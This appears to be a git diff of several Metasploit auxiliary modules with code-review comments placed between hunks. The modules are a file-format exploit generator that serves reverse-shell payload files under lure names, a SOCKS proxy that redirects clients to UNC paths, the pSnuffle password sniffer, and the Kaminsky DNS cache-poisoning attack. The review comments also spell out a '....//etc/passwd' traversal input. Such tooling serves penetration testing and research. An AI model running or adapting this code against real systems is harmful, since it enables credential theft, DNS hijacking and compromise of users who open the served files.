@@ -49,10 +49,10 @@ class Metasploit3 < Msf::Auxiliary ], self.class) end - - def run + + def run @targ = datastore['TARGETHOST'] - + if(@targ and @targ.strip.length == 0) @targ = nil end @@ -84,17 +84,17 @@ class Metasploit3 < Msf::Auxiliary request.qr = 1 request.ra = 1 - + names << "IN #{tc_s} #{name}" case tc_s when 'IN::TXT' - print_status("#{Time.now} PASSED #{addr[3]}:#{addr[1]} XID #{request.id} #{name}") + print_status("#{Time.now} PASSED #{addr[3]}:#{addr[1]} XID #{request.id} #{name}") answer = Resolv::DNS::Resource::IN::TXT.new("#{addr[3]}:#{addr[1]} #{names.join(",")}") request.add_answer(name, 1, answer) reply = true end } - + if(reply) @sock.send(request.encode(), 0, addr[3], addr[1]) else diff --git a/modules/auxiliary/server/file_autopwn.rb b/modules/auxiliary/server/file_autopwn.rb index 93773bf0fd..1ae874df54 100644 --- a/modules/auxiliary/server/file_autopwn.rb +++ b/modules/auxiliary/server/file_autopwn.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -13,15 +17,15 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'File Format Exploit Generator', 'Version' => '$Revision: 8210 $', 'Description' => %q{ This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt. }, - 'Author' => + 'Author' => [ 'et', ], 
@@ -29,68 +33,68 @@ class Metasploit3 < Msf::Auxiliary 'Actions' => [ [ 'WebServer', { - 'Description' => 'Deliver file format exploits in a web page with links to the actual files' + 'Description' => 'Deliver file format exploits in a web page with links to the actual files' } ], [ 'OnlyFiles', { - 'Description' => 'Create file format exploits in selected directory' + 'Description' => 'Create file format exploits in selected directory' } ], - [ 'list', { + [ 'list', { 'Description' => 'List the exploit modules that would be started' } ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'WebServer', 'Email' ], 'DefaultAction' => 'WebServer')) register_options([ - OptAddress.new('LHOST', [ true, + OptAddress.new('LHOST', [ true, 'The IP address to use for reverse-connect payloads' ]), - OptString.new('OUTPUTPATH', [ true, + OptString.new('OUTPUTPATH', [ true, 'The location of the files.', File.join(Msf::Config.get_config_root, 'exploits') ]), - OptBool.new('CREATEFILES', [ true, + OptBool.new('CREATEFILES', [ true, 'Set to false in case files are already in the defined path', true - ]), - OptBool.new('USECONTENTTYPE', [ true, + ]), + OptBool.new('USECONTENTTYPE', [ true, 'Use Content-type header according to file extension. 
Many exploits may fail depending on this value', true - ]), - + ]), + ], self.class) register_advanced_options([ - OptString.new('MATCH', [false, + OptString.new('MATCH', [false, 'Only attempt to use exploits whose name matches this regex' ]), - OptString.new('EXCLUDE', [false, + OptString.new('EXCLUDE', [false, 'Only attempt to use exploits whose name DOES NOT match this regex' ]), - OptBool.new('USEMODNAME', [false, + OptBool.new('USEMODNAME', [false, 'Use module names as file names', true ]), - OptBool.new('USEIFRAMES', [false, + OptBool.new('USEIFRAMES', [false, 'Deliver each file as an iframe in webserver', false ]), - OptString.new('TITLE', [ true, + OptString.new('TITLE', [ true, 'The HTML page title.', 'WALL oF SHAME' ]), - OptString.new('COMMENT', [ true, + OptString.new('COMMENT', [ true, 'HTML page text.', '<b>Welcome!</b><br>' ]), - OptPort.new('LPORT_WIN32', [false, + OptPort.new('LPORT_WIN32', [false, 'The port to use for Windows reverse-connect payloads, default is 3333' ]), - OptPort.new('LPORT_MULTI', [false, + OptPort.new('LPORT_MULTI', [false, 'The port to use for Multi reverse-connect payloads, default is 4444' ]), - OptPort.new('LPORT_MAC', [false, + OptPort.new('LPORT_MAC', [false, 'The port to use for Mac reverse-connect payloads, default is 5555' ]), - OptPort.new('LPORT_GENERIC', [false, + OptPort.new('LPORT_GENERIC', [false, 'The port to use for generic reverse-connect payloads, default is 6666' ]), ], self.class) 
@@ -104,14 +108,14 @@ class Metasploit3 < Msf::Auxiliary def run storexp = File.join(Msf::Config.get_config_root, 'exploits') Dir.mkdir(storexp) unless File.directory?(storexp) - + if (action.name == 'list') m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{} e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$} [ [framework.exploits, 'exploit' ] ].each do |mtype| mtype[0].each_module do |name, mod| m = mod.new - + if ((m.kind_of? Msf::Exploit::FILEFORMAT) and name =~ m_regex and name !~ e_regex) @exploits[name] = nil print_line name @@ -124,11 +128,11 @@ class Metasploit3 < Msf::Auxiliary # tout = Serializer::ReadableText.dump_exploit_target(m, ' ') # print_line tout #rescue - # print_error "Error retrieving targets in #{name}" - #end - end + # print_error "Error retrieving targets in #{name}" + #end + end end - end + end print_line print_status("Found #{@exploits.length} exploit modules") elsif (action.name == 'WebServer') @@ -136,11 +140,11 @@ class Metasploit3 < Msf::Auxiliary warn_no_database end start_exploit_modules() - + if !datastore['CREATEFILES'] print_status("FILES NOT CREATED") end - + if @exploits.length < 1 and datastore["CREATEFILES"] print_error("No exploits, check your MATCH and EXCLUDE settings") return false @@ -151,12 +155,12 @@ class Metasploit3 < Msf::Auxiliary warn_no_database end start_exploit_modules() - - if @exploits.length < 1 + + if @exploits.length < 1 print_error("No exploits, check your MATCH and EXCLUDE settings") return false - end - end + end + end end 
@@ -209,22 +213,22 @@ class Metasploit3 < Msf::Auxiliary else lport = @gen_lport payload='generic/shell_reverse_tcp' - end + end @payloads[lport] = payload if datastore['CREATEFILES'] print_status("File Format exploit #{name} with payload #{payload}") end - + @exploits[name].datastore['SRVHOST'] = datastore['SRVHOST'] @exploits[name].datastore['SRVPORT'] = datastore['SRVPORT'] # For testing, set the exploit uri to the name of the exploit so it's # easy to tell what is happening from the browser. @exploits[name].datastore['OUTPUTPATH'] = datastore['OUTPUTPATH'] - + if (datastore['USEMODNAME']) - @exploits[name].datastore['FILENAME'] = name.gsub(/[\\\/]/, '_') + '_' + @exploits[name].datastore['FILENAME'] + @exploits[name].datastore['FILENAME'] = name.gsub(/[\\\/]/, '_') + '_' + @exploits[name].datastore['FILENAME'] else # Later change for some simple names @exploits[name].datastore['FILENAME'] = filerename(File.extname(@exploits[name].datastore['FILENAME'])) @@ -234,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary @exploits[name].datastore['LHOST'] = @lhost @exploits[name].datastore['EXITFUNC'] = datastore['EXITFUNC'] || 'thread' @exploits[name].datastore['DisablePayloadHandler'] = true - + if datastore['CREATEFILES'] @exploits[name].exploit_simple( 'LocalInput' => self.user_input, @@ -254,12 +258,12 @@ class Metasploit3 < Msf::Auxiliary @exploits.delete(name) return false end - end + end return true end - def start_exploit_modules() + def start_exploit_modules() @lhost = (datastore['LHOST'] || "0.0.0.0") print_line @@ -268,8 +272,8 @@ class Metasploit3 < Msf::Auxiliary print_line m_regex = datastore["MATCH"] ? %r{#{datastore["MATCH"]}} : %r{} e_regex = datastore["EXCLUDE"] ? %r{#{datastore["EXCLUDE"]}} : %r{^$} - - + + [ [framework.exploits, 'exploit' ] ].each do |mtype| framework.exploits.each_module do |name, mod| m = mod.new 
@@ -278,12 +282,12 @@ class Metasploit3 < Msf::Auxiliary end end end - + if action.name == 'OnlyFiles' print_status "--- Done. Files created in #{datastore['OUTPUTPATH']}" return end - + # start handlers for each type of payload [@win_lport, @lin_lport, @osx_lport, @gen_lport].each do |lport| if (lport and @payloads[lport]) @@ -309,16 +313,16 @@ class Metasploit3 < Msf::Auxiliary end - def on_request_uri(cli, request) + def on_request_uri(cli, request) # - # I have NOT fixed dir. transversals! + # I have NOT fixed dir. transversals! # - + print_status("Request '#{request.uri}' from #{cli.peerhost}:#{cli.peerport}") case request.uri when self.get_resource - # This is the first request. + # This is the first request. response = create_response() response["Expires"] = "0" @@ -329,7 +333,7 @@ class Metasploit3 < Msf::Auxiliary Dir.foreach(datastore['OUTPUTPATH']) do |entry| if entry == '.' or entry == '..' # do nothing - else + else if !datastore['USEIFRAMES'] response.body << "<a href= #{self.get_resource+'/'+entry}>#{entry}</a><br>" else @@ -341,13 +345,13 @@ class Metasploit3 < Msf::Auxiliary cli.send_response(response) when %r{^#{self.get_resource}.*} - + fname = request.uri.gsub("#{self.get_resource}/","") - + response = create_response() response["Expires"] = "0" - - + + if datastore['USECONTENTTYPE'] response["Content-type"] = ctype(File.extname(fname))['ctype'] if ctype(File.extname(fname))['cdisp'] @@ -357,9 +361,9 @@ class Metasploit3 < Msf::Auxiliary response["Content-type"] = "application/octet-stream" response["Content-disposition"] = "attachment; filename=#{fname}" end - + fullname = File.join(datastore['OUTPUTPATH'],fname) - + if File.exist?(fullname) and File.file?(fullname) src = File.open(fullname, "rb") while (not src.eof?) 
@@ -378,13 +382,13 @@ class Metasploit3 < Msf::Auxiliary return false end end - + def filerename(ext) # - # A sample way to change file name by type instead of using the ugly + # A sample way to change file name by type instead of using the ugly # exploit name # - + case ext when ".html" then n = "pr0n" + Rex::Text.rand_text_numeric(4) @@ -398,28 +402,28 @@ class Metasploit3 < Msf::Auxiliary n = "test" + Rex::Text.rand_text_numeric(2) when ".m3u" then n = "musical" + Rex::Text.rand_text_numeric(2) - else + else n = "data" + Rex::Text.rand_text_numeric(4) end - + n << ext - + return n - + end def ctype(ext) aret = {} - - + + # - # Need to force download as some exploits (i.e. pdf) - # dont work thru the browser only work when the file is saved and/or opened + # Need to force download as some exploits (i.e. pdf) + # dont work thru the browser only work when the file is saved and/or opened # - + # ctype: Content-type # cdisp: true/false Include a "Content-disposition" header to force save as - + case ext when ".html" then aret['ctype'] = "text/html" @@ -442,12 +446,12 @@ class Metasploit3 < Msf::Auxiliary when ".m3u" then aret['ctype'] = "audio/x-mpegurl" aret['cdisp'] = false - else + else aret['ctype'] = "application/octet-stream" aret['cdisp'] = false end return aret - end + end def warn_no_database print_error("WARNING: Database is disabled") diff --git a/modules/auxiliary/server/ftp.rb b/modules/auxiliary/server/ftp.rb index 9d6393bd25..eb780803a2 100644 --- a/modules/auxiliary/server/ftp.rb +++ b/modules/auxiliary/server/ftp.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ 
@@ -31,7 +31,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Capture' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary end return end - + def on_client_command_pass(c,arg) @state[c][:pass] = arg if(not datastore['FTPPASS'] or (arg == datastore['FTPPASS'])) @@ -70,8 +70,8 @@ class Metasploit3 < Msf::Auxiliary @state[c][:auth] = false end return - end - + end + def on_client_command_retr(c,arg) print_status("#{@state[c][:name]} FTP download request for #{arg}") @@ -79,32 +79,32 @@ class Metasploit3 < Msf::Auxiliary c.put "500 Access denied\r\n" return end - + path = ::File.join(datastore['FTPROOT'], arg.gsub("../", '').gsub("..\\", '')) if(not ::File.exists?(path)) c.put "550 File does not exist\r\n" return end - + conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") return end - + c.put("150 Opening BINARY mode data connection for #{arg}\r\n") conn.put(::File.read(path, ::File.size(path))) c.put("226 Transfer complete.\r\n") conn.close end - + def on_client_command_list(c,arg) if(not @state[c][:auth]) c.put "500 Access denied\r\n" return end - + conn = establish_data_connection(c) if(not conn) c.put("425 Can't build data connection\r\n") @@ -120,28 +120,28 @@ class Metasploit3 < Msf::Auxiliary end if(::File.file?(path)) buf << "rwsx--r--r 1 1 512 Jun 1 2001 #{ent}\r\n" - end + end end - + c.put("150 Opening ASCII mode data connection for /bin/ls\r\n") conn.put("total #{buf.length}\r\n" + buf) - c.put("226 Transfer complete.\r\n") + c.put("226 Transfer complete.\r\n") conn.close end - + def on_client_command_size(c,arg) - + if(not @state[c][:auth]) c.put "500 Access denied\r\n" return end - + path = ::File.join(datastore['FTPROOT'], arg.gsub("../", '').gsub("..\\", '')) if(not ::File.exists?(path)) c.put "550 File does not exist\r\n" return end - + c.put("213 #{::File.size(path)}\r\n") end 
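Review bot: The traversal filter `arg.gsub("../", '').gsub("..\\", '')` in `on_client_command_retr` is a single pass, so a client requesting `....//etc/passwd` is left with `../etc/passwd` after the replacement and `::File.join(datastore['FTPROOT'], ...)` then reads outside FTPROOT; `on_client_command_size` in the next hunk uses the identical expression. Resolving the path and checking it stays under the root is more robust than pattern stripping: `root = ::File.expand_path(datastore['FTPROOT'])`, `path = ::File.expand_path(arg.sub(/\A[\\\/]+/, ''), root)`, and then `if !(path.start_with?(root + ::File::SEPARATOR) and ::File.file?(path))` in place of the `::File.exists?` test, which also stops a directory argument from reaching `::File.read`. This is the operator's own served directory, but the capture server is meant to accept arbitrary clients, so the check is worth having.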
diff --git a/modules/auxiliary/server/socks_unc.rb b/modules/auxiliary/server/socks_unc.rb index 79d370e122..ab2a8ce137 100644 --- a/modules/auxiliary/server/socks_unc.rb +++ b/modules/auxiliary/server/socks_unc.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'SOCKS Proxy UNC Path Redirection', @@ -34,7 +34,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Proxy' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Proxy' ], @@ -56,12 +56,12 @@ class Metasploit3 < Msf::Auxiliary def on_client_connect(client) # print_status("New connection from #{client.peerhost}:#{client.peerport}") end - + def on_client_data(client) # print_status("Data from #{client.peerhost}:#{client.peerport}") process_socks(client) end - + def on_client_close(client) # print_status("Closed connection from #{client.peerhost}:#{client.peerport}") end @@ -75,17 +75,17 @@ class Metasploit3 < Msf::Auxiliary client.put rej true end - + def process_socks(client) req = client.get_once return if !(req and req.length > 2) - + # Versions case req[0] when 0x04 - + sver, sreq, sport, shost, suser, sname = req.unpack('CCnA4Z*Z*') - + # Handle connections only if (sreq != 0x01) return reject(client) 
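Review bot: `case req[0]` is compared with `when 0x04` and `when 0x05`, which only matches when `String#[]` returns an Integer (Ruby 1.8); under Ruby 1.9+ `req[0]` is a one-character String and every client falls through to the `else` reject. `case req[0].ord` or `req.unpack('C')[0]` dispatches correctly on both. `process_socks` continues past this hunk, where `shostlen = req[4]` has the same Integer-versus-String problem.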
@@ -101,16 +101,16 @@ class Metasploit3 < Msf::Auxiliary print_status("Connection attempt from #{client.peerhost}:#{client.peerport} to #{shost}:#{sport} #{suser.inspect}") client.put("\x00\x5a\x00\x00\x00\x00\x00\x00") - + when 0x05 - + sver, scnt, sauth = req.unpack('CCA*') client.put("\x05\x00") - + req = client.get_once - + sver, sreq, sdmp, stype = req.unpack('CCCC') - + # Handle connections only if (sreq != 0x01) return reject(client) @@ -121,27 +121,27 @@ class Metasploit3 < Msf::Auxiliary when 0x01 shost = req[4,4].unpack('C*').join('.') sport = req[8,2].unpack('n')[0] - + when 0x03 shostlen = req[4] shost = req[5, shostlen] sport = req[5+shostlen, 2].unpack('n')[0] - + when 0x04 shost = req[4,16].unpack('n').map{ |x| "%.2x" % x }.join(':') - sport = req[20,2].unpack('n')[0] + sport = req[20,2].unpack('n')[0] end - - print_status("Connection attempt from #{client.peerhost}:#{client.peerport} to #{shost}:#{sport}") - + + print_status("Connection attempt from #{client.peerhost}:#{client.peerport} to #{shost}:#{sport}") + res = "\x05\x00\x00\x01\x00\x00\x00\x00\x00\x00" client.put res - + else return reject(client) end - - + + req = client.get_once hed = req ? req.split(/\n/)[0].strip : '' host = datastore['UNCHOST'] || Rex::Socket.source_address(client.peerhost) @@ -149,7 +149,7 @@ class Metasploit3 < Msf::Auxiliary filename = Rex::Text.rand_text_alpha(8) print_status("Request from #{client.peerhost}:#{client.peerport}: #{hed}") - + body = %Q| <html><head><title>#{Rex::Text.rand_text_alpha(8)} @@ -161,7 +161,7 @@ class Metasploit3 < Msf::Auxiliary res << "Content-Type: text/html\r\n" res << "Connection: Close\r\n" res << "Content-Length: #{body.length}\r\n\r\n#{body}" - + client.put(res) end diff --git a/modules/auxiliary/sniffer/psnuffle.rb b/modules/auxiliary/sniffer/psnuffle.rb index 6c8a824e30..f11be9ff44 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb 
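Review bot: The second `req = client.get_once` in the SOCKS5 branch is unpacked with `req.unpack('CCCC')` without a nil or length check, so a client that sends only the method-selection greeting and then closes raises NoMethodError inside the handler instead of being dropped; guard it the way the first read is guarded, `return if !(req and req.length >= 4)`, before the unpack. `process_socks` starts before this hunk and continues after it.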
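Review bot: `shost = req[4,16].unpack('n')` unpacks only the first 16-bit group, so an IPv6 destination is logged as a single group rather than eight; `req[4,16].unpack('n8').map{ |x| "%.4x" % x }.join(':')` gives the whole address. In the domain-name case (`when 0x03`) `shostlen = req[4]` is an Integer on Ruby 1.8 but a one-character String on 1.9+, where `req[5, shostlen]` raises TypeError; `req[4].ord` works on both, and `req[5, shostlen]` / `req[5+shostlen, 2]` are read without checking that `req.length` covers them, so a short request makes `sport` nil or raises on `nil.unpack`. These are logging-only values in this module, but the handler should not blow up on a truncated request. `process_socks` continues past the hunk.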
@@ -1,16 +1,19 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ # ## - ## # dsniff was helping me very often. Too bad that it doesn't work correctly # anymore. Psnuffle should bring password sniffing into Metasploit local -# and if we get lucky even remote. +# and if we get lucky even remote. # # Cheers - Max Moser - mmo@remote-exploit.org ## @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture - + def initialize super( 'Name' => 'pSnuffle Packet Sniffer', @@ -36,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary [ 'Sniffer' ], [ 'List' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Sniffer' ], @@ -45,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('PROTOCOLS', [true, 'A comma-delimited list of protocols to sniff or "all".', "all"]), - ], self.class) - + ], self.class) + register_advanced_options([ OptPath.new('ProtocolBase', [true, 'The base directory containing the protocol decoders', File.join(Msf::Config.install_root, "data", "exploits", "psnuffle") @@ -60,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if (not File.directory?(base)) raise RuntimeError,"The ProtocolBase parameter is set to an invalid directory" end - + @protos = {} decoders = Dir.new(base).entries.grep(/\.rb$/).sort decoders.each do |n| @@ -72,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary proto = $1 klass = m.const_get("Sniffer#{proto}") @protos[proto.downcase] = klass.new(framework, self) - + print_status("Loaded protocol #{proto} from #{f}...") end rescue ::Exception => e 
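Review bot: `rescue ::Exception => e` around the decoder instantiation also catches Interrupt, SystemExit and NoMemoryError, so a Ctrl-C while `load_protocols` walks `ProtocolBase` is reported as a broken decoder instead of stopping the module; `rescue ::StandardError, ::ScriptError => e` keeps the intent (ScriptError covers the LoadError/SyntaxError a bad decoder file raises) without swallowing signals. Since every `*.rb` in that directory appears to be loaded and then `const_get`/`new`-ed, the `ProtocolBase` advanced option is effectively a code-execution path and its description should say so — e.g. `'The base directory containing the protocol decoders (every .rb file found here is loaded and executed)'`. `load_protocols` starts before this hunk.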
@@ -80,16 +83,16 @@ class Metasploit3 < Msf::Auxiliary end end end - - def run + + def run # Load all of our existing protocols load_protocols - + if(action.name == 'List') print_status("Protocols: #{@protos.keys.sort.join(', ')}") return end - + # Remove protocols not explicitly allowed if(datastore['PROTOCOLS'] != 'all') allowed = datastore['PROTOCOLS'].split(',').map{|x| x.strip.downcase} @@ -98,19 +101,19 @@ class Metasploit3 < Msf::Auxiliary @protos = newlist end - print_status("Sniffing traffic.....") + print_status("Sniffing traffic.....") open_pcap - + each_packet do |pkt| eth = Racket::L2::Ethernet.new(pkt) next if not eth.ethertype == 0x0800 - + ip = Racket::L3::IPv4.new(eth.payload) next if not ip.protocol == 6 - + tcp = Racket::L4::TCP.new(ip.payload) next if !(tcp.payload and tcp.payload.length > 0) - + data = {:raw => pkt, :eth => eth, :ip => ip, :tcp => tcp} @protos.each_key do |k| @@ -121,13 +124,13 @@ class Metasploit3 < Msf::Auxiliary close_pcap print_status("Finished sniffing") end -end +end # End module class # Basic class for taking care of sessions class BaseProtocolParser - + attr_accessor :framework, :module, :sessions, :dport, :sigs def initialize(framework, mod) @@ -145,26 +148,26 @@ class BaseProtocolParser def register_sigs self.sigs = {} end - + # # Glue methods to bridge parsers to the main module class # def print_status(msg) self.module.print_status(msg) end - + def print_error(msg) self.module.print_error(msg) end - + def report_auth_info(*s) self.module.report_auth_info(*s) end - + def report_service(*s) self.module.report_service(*s) end - + def find_session(sessionid) sessions.each_key do |ses| # Check for cleanup abilities... kills performance in large environments maybe 
@@ -182,30 +185,30 @@ class BaseProtocolParser # Create a new session entry along with the host/port from the id if (sessionid =~ /^([^:]+):([^-]+)-/s) sessions[sessionid] = { - :host => $1, - :target_host => $1, - :port => $2, - :target_port => $2, - :session => sessionid, - :ctime => Time.now, + :host => $1, + :target_host => $1, + :port => $2, + :target_port => $2, + :session => sessionid, + :ctime => Time.now, :mtime => Time.now } end end - + return sessions[sessionid] end - - def get_session_src(pkt) + + def get_session_src(pkt) return "#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}" if pkt[:tcp] - return "#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}" if pkt[:udp] - return "#{pkt[:ip].dst_ip}:0-#{pkt[:ip].src_ip}:0" + return "#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}" if pkt[:udp] + return "#{pkt[:ip].dst_ip}:0-#{pkt[:ip].src_ip}:0" end - - def get_session_dst(pkt) + + def get_session_dst(pkt) return "#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}" if pkt[:tcp] - return "#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}" if pkt[:udp] - return "#{pkt[:ip].src_ip}:0-#{pkt[:ip].dst_ip}:0" + return "#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}" if pkt[:udp] + return "#{pkt[:ip].src_ip}:0-#{pkt[:ip].dst_ip}:0" end end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 6f0fb32227..9a1a44f530 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb 
@@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'net/dns' require 'racket' @@ -9,23 +20,23 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DNS BailiWicked Domain Attack', 'Description' => %q{ - This exploit attacks a fairly ubiquitous flaw in DNS implementations which + This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domains nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server - specified in the NEWDNS option of this exploit. + specified in the NEWDNS option of this exploit. }, - 'Author' => - [ + 'Author' => + [ ' I)ruid', 'hdm', # - 'Cedric Blancher ' # Cedric figured out the NS injection method + 'Cedric Blancher ' # Cedric figured out the NS injection method # and was cool enough to email us and share! # ], @@ -39,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 21 2008' )) - + register_options( [ OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), 
@@ -50,29 +61,29 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), ], self.class) - + deregister_options('FILTER','PCAPFILE') end - + def auxiliary_commands - return { + return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server" } end - + def cmd_racer(*args) targ = args[0] || rhost() dom = args[1] || "example.com" - + if !(targ and targ.length > 0) print_status("usage: racer [dns-server] [domain]") return end - - calculate_race(targ, dom) + + calculate_race(targ, dom) end - + def cmd_check(*args) targ = args[0] || rhost() if !(targ and targ.length > 0) @@ -84,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary srv_sock = Rex::Socket.create_udp( 'PeerHost' => targ, 'PeerPort' => 53 - ) + ) random = false ports = {} lport = nil reps = 0 - + 1.upto(30) do |i| - + req = Resolv::DNS::Message.new txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom(65535, 1.0) @@ -120,24 +131,24 @@ class Metasploit3 < Msf::Auxiliary end end end - - + + if(i>5 and ports.keys.length == 0) break - end + end end - + srv_sock.close - + if(ports.keys.length == 0) print_status("ERROR: This server is not replying to recursive requests") return end - + if(reps < 30) print_status("WARNING: This server did not reply to all of our requests") end - + if(random) ports_u = ports.keys.length ports_r = ((ports.keys.length/30.0)*100).to_i @@ -149,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary print_status("FAIL: This server uses a static source port and is vulnerable to poisoning") end end - + def run target = rhost() source = Rex::Socket.source_address(target) 
@@ -161,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary xids = datastore['XIDS'].to_i newttl = datastore['TTL'].to_i xidbase = rand(20001) + 20000 - numxids = xids + numxids = xids address = Rex::Text.rand_text(4).unpack("C4").join(".") srv_sock = Rex::Socket.create_udp( @@ -175,10 +186,10 @@ class Metasploit3 < Msf::Auxiliary txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() - + if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| @@ -219,7 +230,7 @@ class Metasploit3 < Msf::Auxiliary return end end - + end end until not cached rescue ::Interrupt @@ -247,7 +258,7 @@ class Metasploit3 < Msf::Auxiliary #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" answer1.answer.each do |rr1| print_status " Got an #{rr1.type} record: #{rr1.inspect}" - res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) + res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." answer2 = res2.send(domain, Net::DNS::SOA) if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 @@ -256,7 +267,7 @@ class Metasploit3 < Msf::Auxiliary print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" end end - end + end end if barbs.length == 0 @@ -265,7 +276,7 @@ class Metasploit3 < Msf::Auxiliary close_pcap return end - + if(xids == 0) print_status("Calculating the number of spoofed replies to send per query...") qcnt = calculate_race(target, domain, 100) 
@@ -275,10 +286,10 @@ class Metasploit3 < Msf::Auxiliary srv_sock.close close_pcap return - end + end print_status("Sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") end - + # Flood the target with queries and spoofed responses, one will eventually hit queries = 0 responses = 0 @@ -298,11 +309,11 @@ class Metasploit3 < Msf::Auxiliary req.rd = 1 src_ip = source - + if(saddr == 'Random') src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") end - + n = Racket::Racket.new n.l3 = Racket::L3::IPv4.new n.l3.src_ip = src_ip @@ -314,12 +325,12 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = (rand((2**16)-1024)+1024).to_i n.l4.dst_port = 53 n.l4.payload = req.encode - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - buff = n.pack + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + buff = n.pack capture_sendto(buff, target) queries += 1 - + # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) @@ -331,14 +342,14 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port 